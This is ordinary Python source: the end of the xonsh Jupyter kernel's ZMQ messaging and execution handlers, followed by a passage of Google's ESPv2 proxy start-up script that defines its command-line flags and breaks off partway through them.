        self.control_socket = ctx.socket(zmq.ROUTER)
        self.config["control_port"] = bind(
            self.control_socket, connection, self.config["control_port"]
        )
        self.control_stream = zmqstream.ZMQStream(self.control_socket)
        self.control_stream.on_recv(self.control_handler)
        # Stdin:
        self.stdin_socket = ctx.socket(zmq.ROUTER)
        self.config["stdin_port"] = bind(
            self.stdin_socket, connection, self.config["stdin_port"]
        )
        self.stdin_stream = zmqstream.ZMQStream(self.stdin_socket)
        self.stdin_stream.on_recv(self.stdin_handler)
        # Shell
        self.shell_socket = ctx.socket(zmq.ROUTER)
        self.config["shell_port"] = bind(
            self.shell_socket, connection, self.config["shell_port"]
        )
        self.shell_stream = zmqstream.ZMQStream(self.shell_socket)
        self.shell_stream.on_recv(self.shell_handler)
        # start up configuration
        self.dprint(2, "Config:", json.dumps(self.config))
        self.dprint(1, "Starting loops...")
        # Heartbeat runs in its own daemon thread; everything else is
        # served by the tornado/zmq IOLoop on this thread.
        self.hb_thread = threading.Thread(target=self.heartbeat_loop)
        self.hb_thread.daemon = True
        self.hb_thread.start()
        self.dprint(1, "Ready! Listening...")
        ioloop.IOLoop.instance().start()

    def shutdown(self):
        """Shutsdown the kernel"""
        self.exiting = True
        ioloop.IOLoop.instance().stop()

    def dprint(self, level, *args, **kwargs):
        """Print but with debug information."""
        if level <= self.debug_level:
            print("DEBUG" + str(level) + ":", file=sys.__stdout__, *args, **kwargs)
            sys.__stdout__.flush()

    def sign(self, messages):
        """Sign a message list with a secure signature."""
        h = self.auth.copy()
        for m in messages:
            h.update(m)
        return h.hexdigest().encode("ascii")

    def new_header(self, message_type):
        """Make a new header"""
        return {
            "date": datetime.datetime.now().isoformat(),
            "msg_id": str(uuid.uuid4()),
            "username": "kernel",
            "session": self.session_id,
            "msg_type": message_type,
            "version": "5.0",
        }

    def send(
        self,
        stream,
        message_type,
        content=None,
        parent_header=None,
        metadata=None,
        identities=None,
    ):
        """Send data to the client via a stream.

        Parameters
        ----------
        stream : zmq socket or ZMQStream
            Channel to send the message on.
        message_type : str
            Jupyter message type (e.g. "status", "execute_reply").
        content, parent_header, metadata : dict or None, optional
            Message frames; empty dicts when None.
        identities : list or None, optional
            Routing prefix frames, prepended when given.
        """
        header = self.new_header(message_type)
        if content is None:
            content = {}
        if parent_header is None:
            parent_header = {}
        if metadata is None:
            metadata = {}
        # Frames are signed in order: header, parent_header, metadata, content.
        messages = list(map(dump_bytes, [header, parent_header, metadata, content]))
        signature = self.sign(messages)
        parts = [DELIM, signature] + messages
        if identities:
            parts = identities + parts
        self.dprint(3, "send parts:", parts)
        stream.send_multipart(parts)
        if isinstance(stream, zmqstream.ZMQStream):
            stream.flush()

    def deserialize_wire_message(self, wire_message):
        """Split the routing prefix and message frames from a message on the wire"""
        delim_idx = wire_message.index(DELIM)
        identities = wire_message[:delim_idx]
        m_signature = wire_message[delim_idx + 1]
        msg_frames = wire_message[delim_idx + 2 :]
        keys = ("header", "parent_header", "metadata", "content")
        m = {k: load_bytes(v) for k, v in zip(keys, msg_frames)}
        # Verify the HMAC signature before trusting the message.
        check_sig = self.sign(msg_frames)
        if check_sig != m_signature:
            raise ValueError("Signatures do not match")
        return identities, m

    def run_thread(self, loop, name):
        """Run main thread"""
        self.dprint(2, "Starting loop for {name!r}...".format(name=name))
        while not self.exiting:
            self.dprint(2, "{} Loop!".format(name))
            try:
                loop.start()
            except ZMQError as e:
                self.dprint(1, "{} ZMQError!\n {}".format(name, e))
                # EINTR just means the loop was interrupted by a signal;
                # restart it. Any other ZMQ error is fatal.
                if e.errno == errno.EINTR:
                    continue
                else:
                    raise
            except Exception:
                self.dprint(2, "{} Exception!".format(name))
                # Exceptions during shutdown are expected; otherwise re-raise.
                if self.exiting:
                    break
                else:
                    raise
            else:
                self.dprint(2, "{} Break!".format(name))
                break

    def heartbeat_loop(self):
        """Run heartbeat"""
        self.dprint(2, "Starting heartbeat loop...")
        while not self.exiting:
            self.dprint(3, ".", end="")
            try:
                # Echo every heartbeat message straight back to the client.
                zmq.device(zmq.FORWARDER, self.heartbeat_socket, self.heartbeat_socket)
            except zmq.ZMQError as e:
                if e.errno == errno.EINTR:
                    continue
                else:
                    raise
            else:
                break

    def shell_handler(self, message):
        """Dispatch shell messages to their handlers"""
        self.dprint(1, "received:", message)
        identities, msg = self.deserialize_wire_message(message)
        # Dispatch by naming convention: msg_type "foo" -> self.handle_foo.
        handler = getattr(self, "handle_" + msg["header"]["msg_type"], None)
        if handler is None:
            self.dprint(0, "unknown message type:", msg["header"]["msg_type"])
            return
        handler(msg, identities)

    def handle_execute_request(self, message, identities):
        """Handle execute request messages."""
        self.dprint(2, "Xonsh Kernel Executing:", pformat(message["content"]["code"]))
        # Start by sending busy signal
        content = {"execution_state": "busy"}
        self.send(self.iopub_stream, "status", content, parent_header=message["header"])
        # confirm the input that we are executing
        content = {
            "execution_count": self.execution_count,
            "code": message["content"]["code"],
        }
        self.send(
            self.iopub_stream, "execute_input", content, parent_header=message["header"]
        )
        # execute the code
        metadata = {
            "dependencies_met": True,
            "engine": self.session_id,
            "status": "ok",
            "started": datetime.datetime.now().isoformat(),
        }
        content = self.do_execute(parent_header=message["header"], **message["content"])
        self.send(
            self.shell_stream,
            "execute_reply",
            content,
            metadata=metadata,
            parent_header=message["header"],
            identities=identities,
        )
        self.execution_count += 1
        # once we are done, send a signal that we are idle
        content = {"execution_state": "idle"}
        self.send(self.iopub_stream, "status", content, parent_header=message["header"])

    def do_execute(
        self,
        code="",
        silent=False,
        store_history=True,
        user_expressions=None,
        allow_stdin=False,
        parent_header=None,
        **kwargs
    ):
        """Execute user code.

        Returns a Jupyter execute_reply content dict whose "status" is
        "ok", "error" (non-zero return code), or "abort" (interrupted).
        """
        # Empty input: nothing to do, report success immediately.
        if len(code.strip()) == 0:
            return {
                "status": "ok",
                "execution_count": self.execution_count,
                "payload": [],
                "user_expressions": {},
            }
        shell = builtins.__xonsh__.shell
        hist = builtins.__xonsh__.history
        try:
            shell.default(code, self, parent_header)
            interrupted = False
        except KeyboardInterrupt:
            interrupted = True
        if interrupted:
            return {"status": "abort", "execution_count": self.execution_count}
        # The last command's return code decides ok vs. error.
        rtn = 0 if (hist is None or len(hist) == 0) else hist.rtns[-1]
        if 0 < rtn:
            message = {
                "status": "error",
                "execution_count": self.execution_count,
                "ename": "",
                "evalue": str(rtn),
                "traceback": [],
            }
        else:
            message = {
                "status": "ok",
                "execution_count": self.execution_count,
                "payload": [],
                "user_expressions": {},
            }
        return message

    def _respond_in_chunks(self, name, s, chunksize=1024, parent_header=None):
        """Send string *s* to stream *name* as one or more "stream" messages."""
        if s is None:
            return
        n = len(s)
        if n == 0:
            return
        # Pair up [0, c, 2c, ...) with [c, 2c, 3c, ...) to slice s into
        # chunksize-sized pieces (the last pair may over-run, which slicing
        # tolerates).
        lower = range(0, n, chunksize)
        upper = range(chunksize, n + chunksize, chunksize)
        for l, u in zip(lower, upper):
            response = {"name": name, "text": s[l:u]}
            # NOTE(review): this sends on iopub_socket while other handlers
            # use iopub_stream — presumably equivalent here; verify.
            self.send(
                self.iopub_socket, "stream", response, parent_header=parent_header
            )

    def handle_complete_request(self, message, identities):
        """Handles completion requests."""
        content = self.do_complete(
            message["content"]["code"], message["content"]["cursor_pos"]
        )
        self.send(
            self.shell_stream,
            "complete_reply",
            content,
            parent_header=message["header"],
            identities=identities,
        )

    def do_complete(self, code, pos):
        """Get completions."""
        shell = builtins.__xonsh__.shell
        # Complete against the last line only, after alias expansion.
        line = code.split("\n")[-1]
        line = builtins.aliases.expand_alias(line)
        prefix = line.split(" ")[-1]
        endidx = pos
        begidx = pos - len(prefix)
        rtn, _ = self.completer.complete(prefix, line, begidx, endidx, shell.ctx)
        if isinstance(rtn, Set):
            rtn = list(rtn)
        message = {
            "matches": rtn,
            "cursor_start": begidx,
            "cursor_end": endidx,
            "metadata": {},
            "status": "ok",
        }
        return message

    def handle_kernel_info_request(self, message, identities):
        """Handles kernel info requests."""
        content = {
            "protocol_version": "5.0",
            "ipython_version": [1, 1, 0, ""],
            "language": self.language,
            "language_version": self.language_version,
            "implementation": self.implementation,
            "implementation_version": self.implementation_version,
            "language_info": self.language_info,
            "banner": self.banner,
        }
        self.send(
            self.shell_stream,
            "kernel_info_reply",
            content,
            parent_header=message["header"],
            identities=identities,
        )
if __name__ == "__main__":
    # Initialize a headless xonsh session tuned for notebook use: pagers
    # would block the kernel, so they are routed through "cat"; git/man are
    # predicted threadable so they don't hang the shell.
    setup(
        shell_type="jupyter",
        env={"PAGER": "cat"},
        aliases={"less": "cat"},
        xontribs=["coreutils"],
        threadable_predictors={"git": predict_true, "man": predict_true},
    )
    if builtins.__xonsh__.commands_cache.is_only_functional_alias("cat"):
        # this is needed if the underlying system doesn't have cat
        # we supply our own, because we can
        builtins.aliases["cat"] = "xonsh-cat"
        builtins.__xonsh__.env["PAGER"] = "xonsh-cat"
    shell = builtins.__xonsh__.shell
    # Attach the kernel to the shell so shell.default() can call back into it.
    kernel = shell.kernel = XonshKernel()
    kernel.start()
|
start_proxy.py | # Copyright 2019 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import re
import signal
import subprocess
import sys
import threading
import time
# The command to generate Envoy bootstrap config
BOOTSTRAP_CMD = "bin/bootstrap"
# Location of Config Manager and Envoy binary
CONFIGMANAGER_BIN = "bin/configmanager"
ENVOY_BIN = "bin/envoy"
# Health check period in secs, for Config Manager and Envoy.
HEALTH_CHECK_PERIOD = 60
# bootstrap config file will write here.
# By default, envoy writes some logs to /tmp too
# If root file system is read-only, this folder should be
# mounted from tmpfs.
DEFAULT_CONFIG_DIR = "/tmp"
# bootstrap config file name.
BOOTSTRAP_CONFIG = "/bootstrap.json"
# Default Listener port
DEFAULT_LISTENER_PORT = 8080
# Default backend
DEFAULT_BACKEND = "http://127.0.0.1:8082"
# Default rollout_strategy
DEFAULT_ROLLOUT_STRATEGY = "fixed"
# Google default application credentials environment variable
GOOGLE_CREDS_KEY = "GOOGLE_APPLICATION_CREDENTIALS"
# Flag defaults when running on serverless.
SERVERLESS_PLATFORM = "Cloud Run(ESPv2)"
SERVERLESS_XFF_NUM_TRUSTED_HOPS = 0
def gen_bootstrap_conf(args):
    """Assemble the command line that generates the Envoy bootstrap config.

    Returns the command as a list suitable for subprocess execution; the
    output file path is the final positional argument.
    """
    cmd = [BOOTSTRAP_CMD, "--logtostderr", "--admin_port", str(args.status_port)]
    if args.http_request_timeout_s:
        cmd += ["--http_request_timeout_s", str(args.http_request_timeout_s)]
    # Bootstrap config is written under the (tmpfs-mountable) config dir.
    cmd.append(DEFAULT_CONFIG_DIR + BOOTSTRAP_CONFIG)
    print(cmd)
    return cmd
class ArgumentParser(argparse.ArgumentParser):
    """argparse.ArgumentParser that prints the full help text on any
    argument error before exiting with status 1."""

    def error(self, message):
        # Show usage/help on stderr first, then exit with the standard
        # "<prog>: error: <message>" line.
        self.print_help(sys.stderr)
        self.exit(1, '{}: error: {}\n'.format(self.prog, message))
# Notes: These flags should get aligned with that of ESP at
# https://github.com/cloudendpoints/esp/blob/master/start_esp/start_esp.py#L420
def make_argparser():
    """Build the ArgumentParser holding every ESPv2 start-up flag.

    Returns:
        An ArgumentParser (the help-printing subclass defined above)
        populated with service/config, TLS, CORS, header-manipulation,
        path-normalization, tracing, timeout/retry, transcoding,
        deprecated-compatibility, and internal flags.
    """
    parser = ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description='''
        ESPv2 start-up script. This script starts Config Manager and Envoy.
        The service name and config ID are optional. If not supplied, the Config Manager
        fetches the service name and the config ID from the metadata service as
        attributes "service_name" and "service_config_id".
        ESPv2 relies on the metadata service to fetch access tokens for Google
        services. If you deploy ESPv2 outside of Google Cloud environment, you need
        to provide a service account credentials file by setting "creds_key"
        environment variable or by passing "-k" flag to this script.
        ''')
    # Service identity and backend addressing flags.
    parser.add_argument(
        '-s',
        '--service',
        default="",
        help=''' Set the name of the Endpoints service. If omitted and -c not
        specified, ESPv2 contacts the metadata service to fetch the service
        name. ''')
    parser.add_argument(
        '-v',
        '--version',
        default="",
        help=''' Set the service config ID of the Endpoints service.
        If omitted and -c not specified, ESPv2 contacts the metadata
        service to fetch the service config ID. ''')
    parser.add_argument(
        '--service_json_path',
        default=None,
        help='''
        Specify a path for ESPv2 to load the endpoint service config.
        With this flag, ESPv2 will use "fixed" rollout strategy and following
        flags will be ignored:
        --service, --version, and --rollout_strategy.
        ''')
    parser.add_argument(
        '-a',
        '--backend',
        default=DEFAULT_BACKEND,
        help='''
        Specify the local backend application server address
        when using ESPv2 as a sidecar.
        Default value is {backend}. Follow the same format when setting
        manually. Valid schemes are `http`, `https`, `grpc`, and `grpcs`.
        See the flag --enable_backend_address_override for details on how ESPv2
        decides between using this flag vs using the backend addresses specified
        in the service configuration.
        '''.format(backend=DEFAULT_BACKEND))
    parser.add_argument(
        '--enable_backend_address_override',
        action='store_true',
        help='''
        Backend addresses can be specified using either the --backend flag
        or the `backend.rule.address` field in the service configuration.
        For OpenAPI users, note the `backend.rule.address` field is set
        by the `address` field in the `x-google-backend` extension.
        `backend.rule.address` is usually specified when routing to different
        backends based on the route.
        By default, the `backend.rule.address` will take priority over
        the --backend flag for each individual operation.
        Enable this flag if you want the --backend flag to take priority
        instead. This is useful if you are developing on a local workstation.
        Then you use a the same production service config but override the
        backend address via the --backend flag for local testing.
        Note: Only the address will be overridden.
        All other components of `backend.rule` will still apply
        (deadlines, backend auth, path translation, etc).
        ''')
    parser.add_argument('--listener_port', default=None, type=int, help='''
        The port to accept downstream connections.
        It supports HTTP/1.x, HTTP/2, and gRPC connections.
        Default is {port}'''.format(port=DEFAULT_LISTENER_PORT))
    parser.add_argument('-N', '--status_port', '--admin_port', default=0,
        type=int, help=''' Enable ESPv2 Envoy admin on this port. Please refer
        to https://www.envoyproxy.io/docs/envoy/latest/operations/admin.
        By default the admin port is disabled.''')
    # Downstream (client-facing) and upstream (backend) TLS flags.
    parser.add_argument('--ssl_server_cert_path', default=None, help='''
        Proxy's server cert path. When configured, ESPv2 only accepts HTTP/1.x and
        HTTP/2 secure connections on listener_port. Requires the certificate and
        key files "server.crt" and "server.key" within this path.
        Before using this feature, please make sure TLS isn't terminated before ESPv2
        in your deployment model. In general, Cloud Run, GKE(GCLB enforced in ingress)
        and GCE with GCLB configured terminates TLS before ESPv2. If that's the case,
        please don't set up flag.
        ''')
    parser.add_argument('--ssl_server_cipher_suites', default=None, help='''
        Cipher suites to use for downstream connections as a comma-separated list.
        Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/common.proto#auth-tlsparameters''')
    parser.add_argument('--ssl_server_root_cert_path', default=None, help='''
        The file path of root certificates that ESPv2 uses to verify downstream client certificate.
        If not specified, ESPv2 doesn't verify client certificates by default.
        Before using this feature, please make sure mTLS isn't terminated before ESPv2
        in your deployment model. In general, Cloud Run, GKE with container-native load balancing
        and GCE with GCLB configured terminates mTLS before ESPv2. If that's the case,
        please don't set up flag.
        ''')
    parser.add_argument('--ssl_backend_client_cert_path', default=None, help='''
        Proxy's client cert path. When configured, ESPv2 enables TLS mutual
        authentication for HTTPS backends. Requires the certificate and
        key files "client.crt" and "client.key" within this path.''')
    parser.add_argument('--ssl_backend_client_root_certs_file', default=None, help='''
        The file path of root certificates that ESPv2 uses to verify backend server certificate.
        If not specified, ESPv2 uses '/etc/ssl/certs/ca-certificates.crt' by default.''')
    parser.add_argument('--ssl_backend_client_cipher_suites', default=None, help='''
        Cipher suites to use for HTTPS backends as a comma-separated list.
        Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/common.proto#auth-tlsparameters''')
    parser.add_argument('--ssl_minimum_protocol', default=None,
        choices=['TLSv1.0', 'TLSv1.1', 'TLSv1.2', 'TLSv1.3'],
        help=''' Minimum TLS protocol version for client side connection.
        Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/cert.proto#common-tls-configuration.
        ''')
    parser.add_argument('--ssl_maximum_protocol', default=None,
        choices=['TLSv1.0', 'TLSv1.1', 'TLSv1.2', 'TLSv1.3'],
        help=''' Maximum TLS protocol version for client side connection.
        Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/cert.proto#common-tls-configuration.
        ''')
    parser.add_argument('--enable_strict_transport_security', action='store_true',
        help='''Enable HSTS (HTTP Strict Transport Security). "Strict-Transport-Security" response header
        with value "max-age=31536000; includeSubdomains;" is added for all responses from local backend.
        Not valid for remote backends.''')
    parser.add_argument('--generate_self_signed_cert', action='store_true',
        help='''Generate a self-signed certificate and key at start, then
        store them in /tmp/ssl/endpoints/server.crt and /tmp/ssl/endponts/server.key.
        This is useful when only a random self-sign cert is needed to serve
        HTTPS requests. Generated certificate will have Common Name
        "localhost" and valid for 10 years.
        ''')
    parser.add_argument('-z', '--healthz', default=None, help='''Define a
        health checking endpoint on the same ports as the application backend.
        For example, "-z healthz" makes ESPv2 return code 200 for location
        "/healthz", instead of forwarding the request to the backend. Please
        don't use any paths conflicting with your normal requests.
        Default: not used.''')
    # Request/response header manipulation flags.
    parser.add_argument('--add_request_header', default=None, action='append', help='''
        Add a HTTP header to the request before sent to the upstream backend.
        If the header is already in the request, its value will be replaced with the new one.
        It supports envoy variable defined at https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_conn_man/headers#custom-request-response-headers.
        This argument can be repeated multiple times to specify multiple headers.
        For example: --add_request_header=key1=value1 --add_request_header=key2=value2.''')
    parser.add_argument('--append_request_header', default=None, action='append', help='''
        Append a HTTP header to the request before sent to the upstream backend.
        If the header is already in the request, the new value will be appended.
        It supports envoy variable defined at https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_conn_man/headers#custom-request-response-headers.
        This argument can be repeated multiple times to specify multiple headers.
        For example: --append_request_header=key1=value1 --append_request_header=key2=value2.''')
    parser.add_argument('--add_response_header', default=None, action='append', help='''
        Add a HTTP header to the response before sent to the downstream client.
        If the header is already in the response, it will be replaced with the new one.
        It supports envoy variable defined at https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_conn_man/headers#custom-request-response-headers.
        This argument can be repeated multiple times to specify multiple headers.
        For example: --add_response_header=key1=value1 --add_response_header=key2=value2.''')
    parser.add_argument('--append_response_header', default=None, action='append', help='''
        Append a HTTP header to the response before sent to the downstream client.
        If the header is already in the response, the new one will be appended.
        It supports envoy variable defined at https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_conn_man/headers#custom-request-response-headers.
        This argument can be repeated multiple times to specify multiple headers.
        For example: --append_response_header=key1=value1 --append_response_header=key2=value2.''')
    parser.add_argument(
        '--enable_operation_name_header',
        action='store_true',
        help='''
        When enabled, ESPv2 will attach the operation name of the matched route
        in the request to the backend.
        The operation name:
        - For OpenAPI: Is derived from the `operationId` field.
        - For gRPC: Is the fully-qualified name of the RPC.
        The header will be attached with key `X-Endpoint-API-Operation-Name`.
        NOTE: We do NOT recommend relying on this feature. There are no
        guarantees that the operation name will remain consistent across
        multiple service configuration IDs.
        NOTE: If you are using this feature with OpenAPI,
        please only use the last segment of the operation name. For example:
        `1.echo_api_endpoints_cloudesf_testing_cloud_goog.EchoHeader`
        Your backend should parse past the last `.` and only use `EchoHeader`.
        NOTE: For OpenAPI, the operation name may not match the `operationId`
        field exactly. For example, some sanitization may occur that only allows
        alphanumeric characters. The exact sanitization is internal
        implementation detail and is not guaranteed to be consistent.
        '''
    )
    parser.add_argument(
        '-R',
        '--rollout_strategy',
        default=DEFAULT_ROLLOUT_STRATEGY,
        help='''The service config rollout strategy, [fixed|managed],
        Default value: {strategy}'''.format(strategy=DEFAULT_ROLLOUT_STRATEGY),
        choices=['fixed', 'managed'])
    # Customize management service url prefix.
    parser.add_argument(
        '-g',
        '--management',
        default=None,
        help=argparse.SUPPRESS)
    # CORS presets
    parser.add_argument(
        '--cors_preset',
        default=None,
        help='''
        Enables setting of CORS headers. This is useful when using a GRPC
        backend, since a GRPC backend cannot set CORS headers.
        Specify one of available presets to configure CORS response headers
        in nginx. Defaults to no preset and therefore no CORS response
        headers. If no preset is suitable for the use case, use the
        --nginx_config arg to use a custom nginx config file.
        Available presets:
        - basic - Assumes all location paths have the same CORS policy.
        Responds to preflight OPTIONS requests with an empty 204, and the
        results of preflight are allowed to be cached for up to 20 days
        (1728000 seconds). See descriptions for args --cors_allow_origin,
        --cors_allow_methods, --cors_allow_headers, --cors_expose_headers,
        --cors_allow_credentials for more granular configurations.
        - cors_with_regex - Same as basic preset, except that specifying
        allowed origins in regular expression. See descriptions for args
        --cors_allow_origin_regex, --cors_allow_methods,
        --cors_allow_headers, --cors_expose_headers, --cors_allow_credentials
        for more granular configurations.
        ''')
    parser.add_argument(
        '--cors_allow_origin',
        default='*',
        help='''
        Only works when --cors_preset is 'basic'. Configures the CORS header
        Access-Control-Allow-Origin. Defaults to "*" which allows all origins.
        ''')
    parser.add_argument(
        '--cors_allow_origin_regex',
        default='',
        help='''
        Only works when --cors_preset is 'cors_with_regex'. Configures the
        whitelists of CORS header Access-Control-Allow-Origin with regular
        expression.
        ''')
    parser.add_argument(
        '--cors_allow_methods',
        default='GET, POST, PUT, PATCH, DELETE, OPTIONS',
        help='''
        Only works when --cors_preset is in use. Configures the CORS header
        Access-Control-Allow-Methods. Defaults to allow common HTTP
        methods.
        ''')
    parser.add_argument(
        '--cors_allow_headers',
        default=
        'DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization',
        help='''
        Only works when --cors_preset is in use. Configures the CORS header
        Access-Control-Allow-Headers. Defaults to allow common HTTP
        headers.
        ''')
    parser.add_argument(
        '--cors_expose_headers',
        default='Content-Length,Content-Range',
        help='''
        Only works when --cors_preset is in use. Configures the CORS header
        Access-Control-Expose-Headers. Defaults to allow common response headers.
        ''')
    parser.add_argument(
        '--cors_allow_credentials',
        action='store_true',
        help='''
        Only works when --cors_preset is in use. Enable the CORS header
        Access-Control-Allow-Credentials. By default, this header is disabled.
        ''')
    parser.add_argument(
        '--cors_max_age',
        default='480h',
        help='''
        Only works when --cors_preset is in use. Configures the CORS header
        Access-Control-Max-Age. Defaults to 20 days (1728000 seconds).
        The acceptable format is a sequence of decimal numbers, each with
        optional fraction and a unit suffix, such as "300m", "1.5h" or "2h45m".
        Valid time units are "m" for minutes, "h" for hours.
        ''')
    parser.add_argument(
        '--check_metadata',
        action='store_true',
        help='''Enable fetching service name, service config ID and rollout
        strategy from the metadata service.''')
    parser.add_argument('--underscores_in_headers', action='store_true',
        help='''Allow headers contain underscores to pass through. By default
        ESPv2 rejects requests that have headers with underscores.''')
    # Path normalization behavior flags.
    parser.add_argument('--disable_normalize_path', action='store_true',
        help='''Disable normalization of the `path` HTTP header according to
        RFC 3986. It is recommended to keep this option enabled if your backend
        performs path normalization by default.
        The following table provides examples of the request `path` the backend
        will receive from ESPv2 based on the configuration of this flag.
        -----------------------------------------------------------------
        | Request Path | Without Normalization | With Normalization |
        -----------------------------------------------------------------
        | /hello/../world | Rejected | /world |
        | /%%4A | /%%4A | /J |
        | /%%4a | /%%4a | /J |
        -----------------------------------------------------------------
        By default, ESPv2 will normalize paths.
        Disable the feature only if your traffic is affected by the behavior.
        Note: Following RFC 3986, this option does not unescape percent-encoded
        slash characters. See flag `--disallow_escaped_slashes_in_path` to
        enable this non-compliant behavior.
        Note: Case normalization from RFC 3986 is not supported, even if this
        option is enabled.
        For more details, see:
        https://cloud.google.com/api-gateway/docs/path-templating''')
    parser.add_argument('--disable_merge_slashes_in_path', action='store_true',
        help='''Disable merging of adjacent slashes in the `path` HTTP header.
        It is recommended to keep this option enabled if your backend
        performs merging by default.
        The following table provides examples of the request `path` the backend
        will receive from ESPv2 based on the configuration of this flag.
        -----------------------------------------------------------------
        | Request Path | Without Normalization | With Normalization |
        -----------------------------------------------------------------
        | /hello//world | Rejected | /hello/world |
        | /hello/// | Rejected | /hello |
        -----------------------------------------------------------------
        By default, ESPv2 will merge slashes.
        Disable the feature only if your traffic is affected by the behavior.
        For more details, see:
        https://cloud.google.com/api-gateway/docs/path-templating''')
    parser.add_argument('--disallow_escaped_slashes_in_path',
        action='store_true',
        help='''
        Disallows requests with escaped percent-encoded slash characters:
        - %%2F or %%2f is treated as a /
        - %%5C or %%5c is treated as a \
        When enabled, the behavior depends on the protocol:
        - For OpenAPI backends, request paths with unescaped percent-encoded
        slashes will be automatically escaped via a redirect.
        - For gRPC backends, request paths with unescaped percent-encoded
        slashes will be rejected (gRPC does not support redirects).
        This option is **not** RFC 3986 compliant,
        so it is turned off by default.
        If your backend is **not** RFC 3986 compliant and escapes slashes,
        you **must** enable this option in ESPv2.
        This will prevent against path confusion attacks that result in security
        requirements not being enforced.
        For more details, see:
        https://cloud.google.com/api-gateway/docs/path-templating
        and
        https://github.com/envoyproxy/envoy/security/advisories/GHSA-4987-27fx-x6cf
        ''')
    parser.add_argument(
        '--envoy_use_remote_address',
        action='store_true',
        default=False,
        help='''Envoy HttpConnectionManager configuration, please refer to envoy
        documentation for detailed information.''')
    parser.add_argument(
        '--envoy_xff_num_trusted_hops',
        default=None,
        help='''Envoy HttpConnectionManager configuration, please refer to envoy
        documentation for detailed information. The default value is 2 for
        sidecar deployments and 0 for serverless deployments.''')
    parser.add_argument(
        '--envoy_connection_buffer_limit_bytes', action=None,
        help='''
        Configure the maximum amount of data that is buffered for each
        request/response body, in bytes. If not set, default is decided by
        Envoy.
        https://www.envoyproxy.io/docs/envoy/latest/api-v3/config/listener/v3/listener.proto
        ''')
    parser.add_argument(
        '--log_request_headers',
        default=None,
        help='''Log corresponding request headers through
        service control, separated by comma. Example, when
        --log_request_headers=foo,bar, endpoint log will have
        request_headers: foo=foo_value;bar=bar_value if values are available;
        ''')
    parser.add_argument(
        '--log_response_headers',
        default=None,
        help='''Log corresponding response headers through
        service control, separated by comma. Example, when
        --log_response_headers=foo,bar, endpoint log will have
        response_headers: foo=foo_value;bar=bar_value if values are available;
        ''')
    parser.add_argument(
        '--log_jwt_payloads',
        default=None,
        help='''
        Log corresponding JWT JSON payload primitive fields through service control,
        separated by comma. Example, when --log_jwt_payload=sub,project_id, log
        will have jwt_payload: sub=[SUBJECT];project_id=[PROJECT_ID]
        if the fields are available. The value must be a primitive field,
        JSON objects and arrays will not be logged.
        ''')
    parser.add_argument('--service_control_network_fail_policy',
        default='open', choices=['open', 'close'], help='''
        Specify the policy to handle the request in case of network failures when
        connecting to Google service control. If it is `open`, the request will be allowed,
        otherwise, it will be rejected. Default is `open`.
        ''')
    # JWT authentication / JWKS fetching flags.
    parser.add_argument(
        '--disable_jwks_async_fetch',
        action='store_true',
        default=False,
        help='''
        Disable fetching JWKS for JWT authentication to be done before processing any requests.
        If disabled, JWKS fetching is done when authenticating the JWT, the fetching will add
        to the request processing latency. Default is enabled.'''
    )
    parser.add_argument(
        '--jwks_cache_duration_in_s',
        default=None,
        help='''
        Specify JWT public key cache duration in seconds. The default is 5 minutes.'''
    )
    parser.add_argument(
        '--jwks_fetch_num_retries',
        default=None,
        help='''
        Specify the remote JWKS fetch retry policy's number of retries. default None.'''
    )
    parser.add_argument(
        '--jwks_fetch_retry_back_off_base_interval_ms',
        default=None,
        help='''
        Specify JWKS fetch retry exponential back off base interval in milliseconds. default 200 ms if not set'''
    )
    parser.add_argument(
        '--jwks_fetch_retry_back_off_max_interval_ms',
        default=None,
        help='''
        Specify JWKS fetch retry exponential back off maximum interval in milliseconds. default 32s if not set.'''
    )
    # Timeouts and retry policies for external services and backends.
    parser.add_argument(
        '--http_request_timeout_s',
        default=None, type=int,
        help='''
        Set the timeout in seconds for all requests made to all external services
        from ESPv2 (ie. Service Management, Instance Metadata Server, etc.).
        This timeout does not apply to requests proxied to the backend.
        Must be > 0 and the default is 30 seconds if not set.
        ''')
    parser.add_argument(
        '--service_control_check_timeout_ms',
        default=None,
        help='''
        Set the timeout in millisecond for service control Check request.
        Must be > 0 and the default is 1000 if not set. Default
        ''')
    parser.add_argument(
        '--service_control_quota_timeout_ms',
        default=None,
        help='''
        Set the timeout in millisecond for service control Quota request.
        Must be > 0 and the default is 1000 if not set.
        ''')
    parser.add_argument(
        '--service_control_report_timeout_ms',
        default=None,
        help='''
        Set the timeout in millisecond for service control Report request.
        Must be > 0 and the default is 2000 if not set.
        ''')
    parser.add_argument(
        '--service_control_check_retries',
        default=None,
        help='''
        Set the retry times for service control Check request.
        Must be >= 0 and the default is 3 if not set.
        ''')
    parser.add_argument(
        '--service_control_quota_retries',
        default=None,
        help='''
        Set the retry times for service control Quota request.
        Must be >= 0 and the default is 1 if not set.
        ''')
    parser.add_argument(
        '--service_control_report_retries',
        default=None,
        help='''
        Set the retry times for service control Report request.
        Must be >= 0 and the default is 5 if not set.
        ''')
    parser.add_argument(
        '--backend_retry_ons',
        default=None,
        help='''
        The conditions under which ESPv2 does retry on the backends. One or more
        retryOn conditions can be specified by comma-separated list.
        The default is `reset,connect-failure,refused-stream`. Disable retry by
        setting this flag to empty.
        All the retryOn conditions are defined in the
        x-envoy-retry-on(https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_filters/router_filter#x-envoy-retry-on) and
        x-envoy-retry-grpc-on(https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_filters/router_filter#x-envoy-retry-on).
        ''')
    parser.add_argument(
        '--backend_retry_on_status_codes',
